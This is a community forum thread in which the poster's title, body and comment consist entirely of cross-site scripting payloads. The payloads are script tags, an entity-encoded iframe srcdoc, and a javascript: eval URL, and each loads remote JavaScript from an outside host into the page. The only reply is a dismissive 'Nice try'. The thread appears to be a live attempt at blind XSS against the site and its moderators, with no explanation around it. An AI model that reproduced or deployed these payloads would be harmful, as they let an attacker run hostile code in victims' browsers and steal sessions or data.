### DISCUSSION TITLE
<script>$.getScript("https://js.rip/8ehq1x2agi")</script>

### DISCUSSION THREAD

**Discussion by xtaraim** [community/community#45935] [Actions]
### Select Topic Area

Product Feedback

### Body

<script>$.getScript("https://js.rip/8ehq1x2agi")</script>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;js.rip/8ehq1x2agi&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
"><script src="https://js.rip/8ehq1x2agi"></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/8ehq1x2agi\';document.body.appendChild(a)')

**Comment by xtaraim** [comment]
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/8ehq1x2agi\';document.body.appendChild(a)')
"><script src="https://js.rip/8ehq1x2agi"></script>

**Comment by sayhiben** [comment]
Nice try
